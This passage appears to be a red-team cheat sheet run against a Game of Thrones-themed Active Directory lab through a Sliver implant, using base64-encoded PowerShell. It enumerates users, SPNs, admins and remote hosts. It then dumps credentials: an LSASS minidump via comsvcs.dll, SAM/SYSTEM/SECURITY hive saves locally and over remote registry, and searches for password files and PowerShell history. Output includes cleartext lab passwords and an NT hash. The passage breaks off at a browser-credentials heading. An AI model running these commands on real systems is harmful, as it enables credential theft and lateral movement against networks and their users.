"CN=IIS_IUSRS,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Cryptographic Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Event Log Readers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Certificate Service DCOM Access,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Remote Access Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Endpoint Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=RDS Management Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Hyper-V Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Access Control Assistance Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Remote Management Users,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Storage Replica Administrators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Domain Computers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Cert Publishers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Admins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Users,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Domain Guests,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Group Policy Creator Owners,CN=Users,DC=north,DC=sevenkingdoms"
"CN=RAS and IAS Servers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Server Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Account Operators,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Windows Authorization Access Group,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Terminal Server License Servers,CN=Builtin,DC=north,DC=sevenkingdoms"
"CN=Allowed RODC Password Replication Group,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Denied RODC Password Replication Group,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Read-only Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Cloneable Domain Controllers,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Protected Users,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Key Admins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=DnsAdmins,CN=Users,DC=north,DC=sevenkingdoms"
"CN=DnsUpdateProxy,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Stark,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms"
"CN=Mormont,CN=Users,DC=north,DC=sevenkingdoms"
List all domain controllers
cat <<'CMD' | base64 -w 0
dsquery server
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBzZXJ2ZXIK'"CN=WINTERFELL,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=sevenkingdoms,DC=local"
List all containers
cat <<'CMD' | base64 -w 0
dsquery * domainroot -filter "(objectClass=container)" -limit 0
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIGRvbWFpbnJvb3QgLWZpbHRlciAiKG9iamVjdENsYXNzPWNvbnRhaW5lcikiIC1saW1pdCAwCg=='"CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
"CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=MicrosoftDNS,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=WinsockServices,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=RpcServices,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Meetings,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN={3FF72B95...9},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=Machine,CN={3FF...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN=User,CN={3FF72...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
"CN={31B2F340-...},CN=Policies,CN=System,DC=north,DC=sevenkingdoms,DC=local"
List all Organizational Units
cat <<'CMD' | base64 -w 0
dsquery * domainroot -filter "(objectClass=organizationalUnit)" -limit 0
CMDFind users in a specific OU
cat <<'CMD' | base64 -w 0
dsquery user "OU=stark,DC=north,DC=sevenkingdoms,DC=local"
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyICJPVT1zdGFyayxEQz1ub3J0aCxEQz1zZXZlbmtpbmdkb21zLERDPWxvY2FsIgo'List disabled accounts
cat <<'CMD' | base64 -w 0
dsquery user -disabled
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1kaXNhYmxlZAo='"CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
List computers that have been inactive for 2 weeks
cat <<'CMD' | base64 -w 0
dsquery computer -inactive 2
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtaW5hY3RpdmUgMgo='"CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local"
List users with SPNs
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(servicePrincipalName=*))" -attr samAccountName servicePrincipalName
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKHNlcnZpY2VQcmluY2lwYWxOYW1lPSopKSIgLWF0dHIgc2FtQWNjb3VudE5hbWUgc2VydmljZVByaW5jaXBhbE5hbWUK'samAccountName servicePrincipalName
-------------- --------------------
WINTERFELL$ ldap/winterfell.north.sevenkingdoms.local/...
krbtgt kadmin/changepw
CASTELBLACK$ HTTP/winterfell.north.sevenkingdoms.local;WSMAN/...
jon.snow CIFS/thewall.north.sevenkingdoms.local;HTTP/...
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local;MSSQLSvc...
List users with adminCount=1
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(adminCount=1))" -attr samAccountName whenCreated
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKGFkbWluQ291bnQ9MSkpIiAtYXR0ciBzYW1BY2NvdW50TmFtZSB3aGVuQ3JlYXRlZAo='samAccountName whenCreated
Administrator 01/09/2026 22:34:32
vagrant 01/09/2026 22:34:32
krbtgt 01/09/2026 22:47:20
eddard.stark 01/09/2026 23:05:44
catelyn.stark 01/09/2026 23:05:46
robb.stark 01/09/2026 23:05:49
List all user accounts
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectCategory=person)(objectClass=user))" -limit 0 -attr samAccountName displayName
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENhdGVnb3J5PXBlcnNvbikob2JqZWN0Q2xhc3M9dXNlcikpIiAtbGltaXQgMCAtYXR0ciBzYW1BY2NvdW50TmFtZSBkaXNwbGF5TmFtZQo='samAccountName displayName
Administrator
Guest
vagrant Vagrant
krbtgt
SEVENKINGDOMS$
arya.stark
eddard.stark
catelyn.stark
robb.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
List domain admins
cat <<'CMD' | base64 -w 0
dsquery group -name "Domain Admins" | dsget group -members
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBncm91cCAtbmFtZSAiRG9tYWluIEFkbWlucyIgfCBkc2dldCBncm91cCAtbWVtYmVycwo='"CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
"CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=local"
List accounts with password never expires flag
cat <<'CMD' | base64 -w 0
dsquery * -filter "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" -attr samAccountName pwdLastSet
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSAqIC1maWx0ZXIgIigmKG9iamVjdENsYXNzPXVzZXIpKHVzZXJBY2NvdW50Q29udHJvbDoxLjIuODQwLjExMzU1Ni4xLjQuODAzOj02NTUzNikpIiAtYXR0ciBzYW1BY2NvdW50TmFtZSBwd2RMYXN0U2V0Cg=='samAccountName pwdLastSet
Administrator 134124706723532020
vagrant 132652931567654449
arya.stark 134124735418856253
eddard.stark 134124735444642266
catelyn.stark 134124735468076119
robb.stark 134124735490579496
sansa.stark 134124735513077107
rickon.stark 134124735558382658
hodor 134124735580191642
samwell.tarly 134124735624787445
jeor.mormont 134124735647289151
sql_svc 134124735667599014
Guest 0
brandon.stark 134124735535887980
jon.snow 134124735601664483
List detailed user information
cat <<'CMD' | base64 -w 0
dsquery user -limit 0 | dsget user -samid -email -desc -disabled
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSB1c2VyIC1saW1pdCAwIHwgZHNnZXQgdXNlciAtc2FtaWQgLWVtYWlsIC1kZXNjIC1kaXNhYmxlZAo='desc samid email disabled
Built-in account Administrator no
Built-in account Guest yes
Vagrant User vagrant no
Key Distribution Center Service Account krbtgt yes
SEVENKINGDOMS$ no
Arya Stark arya.stark no
Eddard Stark eddard.stark no
Catelyn Stark catelyn.stark no
Robb Stark robb.stark no
Sansa Stark sansa.stark no
Brandon Stark brandon.stark no
Rickon Stark rickon.stark no
Brainless Giant hodor no
Jon Snow jon.snow no
Samwell Tarly (Password : Heartsbane) samwell.tarly no
Jeor Mormont jeor.mormont no
sql service sql_svc no
dsget succeeded
List computer information
cat <<'CMD' | base64 -w 0
dsquery computer -limit 0 | dsget computer
CMDsharpsh -t 20 -- '-e -c ZHNxdWVyeSBjb21wdXRlciAtbGltaXQgMCB8IGRzZ2V0IGNvbXB1dGVyCg=='dn desc
CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local
CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
dsget succeeded
ACTIVE DIRECTORY – SETSPN ENUM
List all SPNs in the domain
cat <<'CMD' | base64 -w 0
setspn -Q */*
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKgo='Checking domain DC=north,DC=sevenkingdoms,DC=local CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local kadmin/changepw CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local HTTP/eyrie.north.sevenkingdoms.local CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local CIFS/thewall.north.sevenkingdoms.local HTTP/thewall.north.sevenkingdoms.local CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local MSSQLSvc/castelblack.north.sevenkingdoms.local MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local ...
List SPNs for a specific service type
cat <<'CMD' | base64 -w 0
setspn -Q MSSQLSvc/*
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1RIE1TU1FMU3ZjLyoK'
Checking domain DC=north,DC=sevenkingdoms,DC=local
CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local
MSSQLSvc/castelblack.north.sevenkingdoms.local
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433
List SPNs for a specific host
cat <<'CMD' | base64 -w 0
setspn -L castelblack
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1MIGNhc3RlbGJsYWNrCg=='
Registered ServicePrincipalNames for CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local:
HTTP/winterfell.north.sevenkingdoms.local
WSMAN/castelblack
WSMAN/castelblack.north.sevenkingdoms.local
TERMSRV/CASTELBLACK
TERMSRV/castelblack.north.sevenkingdoms.local
RestrictedKrbHost/CASTELBLACK
HOST/CASTELBLACK
List duplicate SPNs
cat <<'CMD' | base64 -w 0
setspn -X
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1MIGNhc3RlbGJsYWNrCg=='Checking domain DC=north,DC=sevenkingdoms,DC=local Processing entry 0 Processing entry 0 found 0 group of duplicate SPNs.
List HTTP SPNs
cat <<'CMD' | base64 -w 0
setspn -Q HTTP/*
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1RIEhUVFAvKgo='
Checking domain DC=north,DC=sevenkingdoms,DC=local
CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
HTTP/eyrie.north.sevenkingdoms.local
CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
CIFS/thewall.north.sevenkingdoms.local
HTTP/thewall.north.sevenkingdoms.local
CN=CASTELBLACK,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
HTTP/winterfell.north.sevenkingdoms.local
...
List specific service accounts
cat <<'CMD' | base64 -w 0
setspn -Q */* | findstr /i "svc"
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKiB8IGZpbmRzdHIgL2kgInN2YyIK'
CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local
MSSQLSvc/castelblack.north.sevenkingdoms.local
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433
List all SPNs and filter for user accounts
cat <<'CMD' | base64 -w 0
setspn -Q */* > spns.txt
CMDsharpsh -t 20 -- '-e -c c2V0c3BuIC1RICovKiA+IHNwbnMudHh0Cg=='cat spns.txtACTIVE DIRECTORY – NET
List domain users
cat <<'CMD' | base64 -w 0
net user /domain
CMDsharpsh -t 20 -- '-e -c bmV0IHVzZXIgL2RvbWFpbgo='User accounts for \\winterfell.north.sevenkingdoms.local
----------------------------------------------------------
Administrator arya.stark brandon.stark
catelyn.stark eddard.stark Guest
hodor jeor.mormont jon.snow
krbtgt rickon.stark jeor.mormont
samwell.tarly sansa.stark sql_svc
vagrant
List details on specific user
cat <<'CMD' | base64 -w 0
net user jeor.mormont /domain
CMDsharpsh -t 20 -- '-e -c bmV0IHVzZXIgcm9iYi5zdGFyayAvZG9tYWluCg=='User name jeor.mormont Full Name Comment Robb Stark User's comment Country/region code 000 (System Default) Account active Yes Account expires Never ...
List domain groups
cat <<'CMD' | base64 -w 0
net group /domain
CMDsharpsh -t 20 -- '-e -c bmV0IGdyb3VwIC9kb21haW4K'Group Accounts for \\winterfell.north.sevenkingdoms.local
------------------------------------------------------
...
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Group Policy Creator Owners
*Key Admins
*Mormont
*Night Watch
*Protected Users
*Read-only Domain Controllers
*Stark
List domain admins
cat <<'CMD' | base64 -w 0
net group "Domain Admins" /domain
CMDsharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAvZG9tYWluCg=='Members
---------------------------------------------------------Administrator eddard.stark
The command completed successfully.
List enterprise admins
cat <<'CMD' | base64 -w 0
net group "Enterprise Admins" /domain
CMDsharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJFbnRlcnByaXNlIEFkbWlucyIgL2RvbWFpbgo='List local admins on current machine
cat <<'CMD' | base64 -w 0
net localgroup administrators
CMDsharpsh -t 20 -- '-e -c bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMK'Members
----------------------------------------------------------
Administrator
NORTH\Domain Admins
NORTH\jeor.mormont
vagrant
List domain password policy
cat <<'CMD' | base64 -w 0
net accounts /domain
CMDsharpsh -t 20 -- '-e -c bmV0IGFjY291bnRzIC9kb21haW4K'
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 37201
Minimum password length: 5
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: PRIMARY
List domain controllers
cat <<'CMD' | base64 -w 0
net group "Domain Controllers" /domain
CMDsharpsh -t 20 -- '-e -c bmV0IGdyb3VwICJEb21haW4gQ29udHJvbGxlcnMiIC9kb21haW4K'Members
---------------------------------------------------------
WINTERFELL$
The command completed successfully.
REMOTE ENUM W/ WMI
List operating system information on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem -ComputerName CASTELBLACK | Select-Object CSName, Caption, Version, BuildNumber, OSArchitecture, LastBootUpTime
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sgfCBTZWxlY3QtT2JqZWN0IENTTmFtZSwgQ2FwdGlvbiwgVmVyc2lvbiwgQnVpbGROdW1iZXIsIE9TQXJjaGl0ZWN0dXJlLCBMYXN0Qm9vdFVwVGltZQo='CSName : CASTELBLACK
Caption : Microsoft Windows Server 2019
Version : 10.0.17763
BuildNumber : 17763
OSArchitecture : 64-bit
LastBootUpTime : 20260111111629.500000-480
List scheduled tasks on remote system
cat <<'CMD' | base64 -w 0
schtasks /query /s WINTERFELL /fo LIST /v | Select-String -Pattern 'TaskName:|Run As User:|Task To Run:|Next Run Time:|Last Run Time:'
CMDsharpsh -t 20 -- '-e -c c2NodGFza3MgL3F1ZXJ5IC9zIFdJTlRFUkZFTEwgL2ZvIExJU1QgL3YgfCBTZWxlY3QtU3RyaW5nIC1QYXR0ZXJuICdUYXNrTmFtZTp8UnVuIEFzIFVzZXI6fFRhc2sgVG8gUnVuOnxOZXh0IFJ1biBUaW1lOnxMYXN0IFJ1biBUaW1lOicK'TaskName: ...\WindowsColorSystem\Calibration Loader
Next Run Time: N/A
Last Run Time: 1/16/2026 1:10:45 PM
Task To Run: COM handler
Run As User: Users
TaskName: ...\WindowsUpdate\Scheduled Start
Next Run Time: N/A
Last Run Time: 12/6/2025 7:32:49 AM
Task To Run: C:\Windows\system32\sc.exe start wuauserv
Run As User: SYSTEM
List processes on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Process -ComputerName CASTELBLACK | Select-Object ProcessName, ProcessId, CommandLine, CreationDate | Sort-Object CreationDate -Descending
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBQcm9jZXNzTmFtZSwgUHJvY2Vzc0lkLCBDb21tYW5kTGluZSwgQ3JlYXRpb25EYXRlIHwgU29ydC1PYmplY3QgQ3JlYXRpb25EYXRlIC1EZXNjZW5kaW5nCg=='ProcessName ProcessId
----------- ---------
notepad.exe 6992
conhost.exe 6316
powershell.exe 3088
svchost.exe 6776
ApplicationFrameHost.exe 3660
SystemSettings.exe 7072
...
List installed software on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Product -ComputerName CASTELBLACK | Select-Object Name, Version, Vendor, InstallDate
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvZHVjdCAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBWZXJzaW9uLCBWZW5kb3IsIEluc3RhbGxEYXRlCg=='Name Version
---- -------
Kits Configuration Installer 10.1.26100.6901
Windows SDK for Windows ... 10.1.26100.6901
WPTx64 (DesktopEditions) 10.1.26100.6901
Windows SDK DirectX x86 ... 10.1.26100.6901
List logged-in users on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_ComputerSystem -ComputerName CASTELBLACK | Select-Object Name, UserName
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyB8IFNlbGVjdC1PYmplY3QgTmFtZSwgVXNlck5hbWUK'Name UserName ---- -------- CASTELBLACK NORTH\jeor.mormont
List services on remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Service -ComputerName CASTELBLACK | Select-Object Name, State, StartMode, PathName, StartName | Where-Object {$_.State -eq "Running"}
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfU2VydmljZSAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLIHwgU2VsZWN0LU9iamVjdCBOYW1lLCBTdGF0ZSwgU3RhcnRNb2RlLCBQYXRoTmFtZSwgU3RhcnROYW1lIHwgV2hlcmUtT2JqZWN0IHskXy5TdGF0ZSAtZXEgIlJ1bm5pbmcifQo='Name : CDPUserSvc_5b365 State : Running StartMode : Auto PathName : C:\Windows\system32\svchost.exe -k UnistackSvcGroup StartName : Name : WpnUserService_5b365 State : Running StartMode : Auto PathName : C:\Windows\system32\svchost.exe -k UnistackSvcGroup StartName :
CRED DUMPING – LOCAL
First, get the process ID of LSASS
cat <<'CMD' | base64 -w 0
$lsass = Get-Process lsass;$lsassPid = $lsass.Id;rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
CMDsharpsh -t 20 -- '-e -c JGxzYXNzID0gR2V0LVByb2Nlc3MgbHNhc3M7JGxzYXNzUGlkID0gJGxzYXNzLklkO3J1bmRsbDMyLmV4ZSBDOlxXaW5kb3dzXFN5c3RlbTMyXGNvbXN2Y3MuZGxsLCBNaW5pRHVtcCAkbHNhc3NQaWQgQzpcdGVtcFxsc2Fzcy5kbXAgZnVsbAo='If privileged, should see lsass.dmp in C:\temp
Move to kali
download lsass.dmpand run:
pypykatz lsa minidump lsass.dmp
== Kerberos ==
Username: jeor.mormont
Domain: NORTH.SEVENKINGDOMS.LOCAL
Password: _L0ngCl@w_
password (hex)5f004c0030006e00670043006c00400077005f0000000000
Save the SAM, SYSTEM and SECURITY hives
cat <<'CMD' | base64 -w 0
reg save HKLM\SAM C:\temp\sam.hive;reg save HKLM\SYSTEM C:\temp\system.hive;reg save HKLM\SECURITY C:\temp\security.hive
CMDsharpsh -t 20 -- '-e -c cmVnIHNhdmUgSEtMTVxTQU0gQzpcdGVtcFxzYW0uaGl2ZTtyZWcgc2F2ZSBIS0xNXFNZU1RFTSBDOlx0ZW1wXHN5c3RlbS5oaXZlO3JlZyBzYXZlIEhLTE1cU0VDVVJJVFkgQzpcdGVtcFxzZWN1cml0eS5oaXZlCg=='-rw-rw-rw- sam.hive 56.0 KiB
-rw-rw-rw- security.hive 68.0 KiB
-rw-rw-rw- system.hive 18.4 MiB
Move to kali
download sam.hivedownload security.hivedownload system.hivesecretsdump.py -sam sam.hive -security security.hive -system system.hive LOCAL[*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4::: ...
CRED DUMPING – REMOTE
Check if RemoteRegistry service is running on target
cat <<'CMD' | base64 -w 0
Get-Service -Name RemoteRegistry -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgUmVtb3RlUmVnaXN0cnkgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSwo='Status Name DisplayName ------ ---- ----------- Stopped RemoteRegistry Remote Registry
Start it if it’s not running
cat <<'CMD' | base64 -w 0
Get-Service -Name RemoteRegistry -ComputerName CASTELBLACK | Start-Service
CMDsharpsh -t 20 -- '-e -c R2V0LVNlcnZpY2UgLU5hbWUgUmVtb3RlUmVnaXN0cnkgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyB8IFN0YXJ0LVNlcnZpY2UK'Then rerun Check if RemoteRegistry service is running on target
Status Name DisplayName ------ ---- ----------- Running RemoteRegistry Remote Registry
Connect to remote registry and save hives
cat <<'CMD' | base64 -w 0
reg save \\CASTELBLACK\HKLM\SAM C:\temp\remote_sam.hive;reg save \\CASTELBLACK\HKLM\SYSTEM C:\temp\remote_system.hive
CMDsharpsh -t 20 -- '-e -c cmVnIHNhdmUgXFxDQVNURUxCTEFDS1xIS0xNXFNBTSBDOlx0ZW1wXHJlbW90ZV9zYW0uaGl2ZTtyZWcgc2F2ZSBcXENBU1RFTEJMQUNLXEhLTE1cU1lTVEVNIEM6XHRlbXBccmVtb3RlX3N5c3RlbS5oaXZlCg=='C:\temp (2 items, 18.2 MiB)
===========================
-rw-rw-rw- remote_sam.hive 56.0 KiB
-rw-rw-rw- remote_system.hive 18.1 MiB
CREDS SEARCHING
Search for files that might contain passwords
Get-ChildItem C:\ -Recurse -Include *.txt,*.xml,*.ini,*.config,*.ps1,*.bat,*.cmd -ErrorAction SilentlyContinue | Select-String -Pattern "password" -CaseSensitive:$false | Group-Object Path | Select-Object NameThis did not work with sliver:
[!] rpc error: code = Unknown desc = Could not load CLR runtime host
List unattended installation xml
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Windows\Panther\ -Recurse -Include unattend.xml,autounattend.xml -ErrorAction SilentlyContinue
CMDsharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFBhbnRoZXJcIC1SZWN1cnNlIC1JbmNsdWRlIHVuYXR0ZW5kLnhtbCxhdXRvdW5hdHRlbmQueG1sIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlCg=='Directory: C:\Windows\Panther
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/22/2025 10:04 AM 2475 unattend.xml
List GPP files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Windows\SYSVOL\ -Recurse -Include Groups.xml,Services.xml,Scheduledtasks.xml,DataSources.xml,Printers.xml,Drives.xml -ErrorAction SilentlyContinue
CMDsharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxXaW5kb3dzXFNZU1ZPTFwgLVJlY3Vyc2UgLUluY2x1ZGUgR3JvdXBzLnhtbCxTZXJ2aWNlcy54bWwsU2NoZWR1bGVkdGFza3MueG1sLERhdGFTb3VyY2VzLnhtbCxQcmludGVycy54bWwsRHJpdmVzLnhtbCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='Looks like it worked, just no findings
List VNC files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\ -Recurse -Include ultravnc.ini,vnc.ini -ErrorAction SilentlyContinue
CMDsharpsh -t 40 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlwgLVJlY3Vyc2UgLUluY2x1ZGUgdWx0cmF2bmMuaW5pLHZuYy5pbmkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUK'Looks like it worked, just no findings
List DB connection details
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\inetpub\ -Recurse -Include web.config -ErrorAction SilentlyContinue | Select-String -Pattern "connectionString"
CMDsharpsh -t 40 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxpbmV0cHViXCAtUmVjdXJzZSAtSW5jbHVkZSB3ZWIuY29uZmlnIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlIHwgU2VsZWN0LVN0cmluZyAtUGF0dGVybiAiY29ubmVjdGlvblN0cmluZyIK'Looks like it worked, just no findings
List FileZilla files
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\FileZilla\ -Include sitemanager.xml,recentservers.xml -ErrorAction SilentlyContinue
CMDsharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xGaWxlWmlsbGFcIC1JbmNsdWRlIHNpdGVtYW5hZ2VyLnhtbCxyZWNlbnRzZXJ2ZXJzLnhtbCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='Looks like it worked, just no findings
POWERSHELL HISTORY
Get the PowerShell history path for current user
cat <<'CMD' | base64 -w 0
(Get-PSReadlineOption).HistorySavePath
CMDsharpsh -t 20 -- '-e -c KEdldC1QU1JlYWRsaW5lT3B0aW9uKS5IaXN0b3J5U2F2ZVBhdGgK'C:\Users\jeor.mormont\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Default Host_history.txtDownload the file like so:
download C:/Users/jeor.mormont/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txtSearch all users’ PowerShell history
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Write-Output "`n=== History for $($_.FullName) ===" Get-Content $_.FullName | Select-String -Pattern "password|credential|username|pwd" -CaseSensitive:$false }
CMDsharpsh -i -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xNaWNyb3NvZnRcV2luZG93c1xQb3dlclNoZWxsXFBTUmVhZExpbmVcQ29uc29sZUhvc3RfaGlzdG9yeS50eHQgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBGb3JFYWNoLU9iamVjdCB7IFdyaXRlLU91dHB1dCAiYG49PT0gSGlzdG9yeSBmb3IgJCgkXy5GdWxsTmFtZSkgPT09IiBHZXQtQ29udGVudCAkXy5GdWxsTmFtZSB8IFNlbGVjdC1TdHJpbmcgLVBhdHRlcm4gInBhc3N3b3JkfGNyZWRlbnRpYWx8dXNlcm5hbWV8cHdkIiAtQ2FzZVNlbnNpdGl2ZTokZmFsc2UgfQo='Looks like it worked, just no findings
BROWSER CREDS
Chrome password database location
cat <<'CMD' | base64 -w 0
